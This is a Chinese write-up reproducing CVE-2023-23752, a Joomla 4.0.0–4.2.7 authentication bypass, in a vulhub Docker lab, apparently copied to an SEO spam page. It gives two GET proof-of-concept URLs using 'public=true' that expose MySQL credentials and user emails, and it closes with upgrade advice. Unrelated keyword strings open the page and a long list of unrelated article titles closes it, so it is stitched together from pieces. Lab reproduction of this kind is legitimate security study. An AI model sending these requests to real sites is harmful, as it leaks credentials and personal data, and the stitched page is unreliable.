当前位置: 首页 > news >正文

网站开发人员工工资网站建设基础服务

网站开发人员工工资,网站建设基础服务,网络推广合作平台,山西网络广告推广CVE-2023-23752:Joomla未授权访问漏洞复现 前言 本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!! 一.Openfire简介 Joomla是一个免费的开源内容管理系统(CMS&a…

CVE-2023-23752:Joomla未授权访问漏洞复现

前言

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!

一.Openfire简介

Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。

二.漏洞简述

在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。

三.漏洞原理

CVE-2023-23752 是身份验证绕过,导致 Joomla 信息泄露。

四.影响版本

4.0.0 <= Joomla <= 4.2.7

五.环境搭建

在kali的docker中搭建vulhub进行漏洞复现
clone项目:

 sudo git clone https://github.com/vulhub/vulhub.git

在这里插入图片描述在/joomla/CVE-2023-23752/目录,用下面的命令下载并启动:

sudo docker-compose up -d

在这里插入图片描述搞定,查看环境:

sudo docker-compose ps

在这里插入图片描述看到端口,这里是8080。

在浏览器上访问http://your-ip:8080

进入环境,说明配置成功了,接下来就可以开始愉快的漏洞复现了:

在这里插入图片描述

六.漏洞复现

Joomla 大致有三个路由入口,分别是:

根目录的index.php(用户访问文章)
根目录的administrator/index.php(管理员管理)
根目录的api/index.php(开发者爱好的Rest API)

未授权的接口正是第三个入口,因此受影响范围为 Joomla4.0.0——Joomla4.2.7(Rest API 4.x正式开发)
1.漏洞利用
此问题是由属性覆盖问题引起的,攻击者可以使用 public=true 以绕过授权检查。
例如,通过以下POC1公开所有配置,包括MySQL用户名和密码:
POC1(GET)

http://your-ip:8080/api/index.php/v1/config/application?public=true

在这里插入图片描述在这里插入图片描述POC2(GET)

http://your-ip:8080/api/index.php/v1/users?public=true

通过以以上POC公开所有用户信息,包括电子邮件:
在这里插入图片描述
我们发现了用户信息以及用户电子邮件。

七.修复建议

目前官方已发布安全版本修复此漏洞,建议存在风险的用户及时升级到安全版本。
安全版本:Joomla >= 4.2.8

下载链接:

https://downloads.joomla.org/
http://www.yayakq.cn/news/846635/

相关文章:

  • 模板建站难度大网站套模板什么意思
  • 网站变灰色代码太原网站建设电话
  • 西安高端网站建设电商网站seo优化
  • 做礼品贸易好的网站网站实施过程
  • 网站管理包括哪些内容东莞公司网站建设教程
  • 做建筑效果图最好的网站凡科商城怎么收费
  • 织梦网站更改主页链接手机网站建设价位
  • 给个免费网站好人有好报it培训机构排名及学费
  • 什么网站可以做网站网站根目录怎么写
  • 徐州网站建设多少钱wordpress pdf手册
  • 做ppt的网站兼职快速制作网站
  • 零食网站页面模板wordpress移动端悬浮导航代码
  • 简单个人博客模板网站wordpress 登陆 443
  • 零基础学习做网站域名注册网站源码
  • 蛋糕店网站源码wordpress 固定连接
  • 自己做视频会员网站商品图片网站开发
  • 南昌网络营销网站搜索引擎网站搭建
  • 卯兔科技西安网站建设长安网站建设好吗
  • 延吉网站建设depawo装修网单
  • 网站优化 套站企业网站备案
  • 南昌企业网站建设公司哪个好推广是做什么
  • 东莞纸箱定制 技术支持 东莞网站建设wordpress dms
  • 手机网站自动适配代码semen是什么意思
  • php+做网站泸州网站建设公司
  • 上海网站建设在哪网站建设与管理A卷
  • 网站建设制作找哪家网站免费建设
  • 中山外贸网站建设手机如何制作app
  • 网站的规划与建设如何在网站上做用工登记
  • 制作视频网站教程昆明自助建站模板
  • 跨境电商网站建设开发好的响应式网站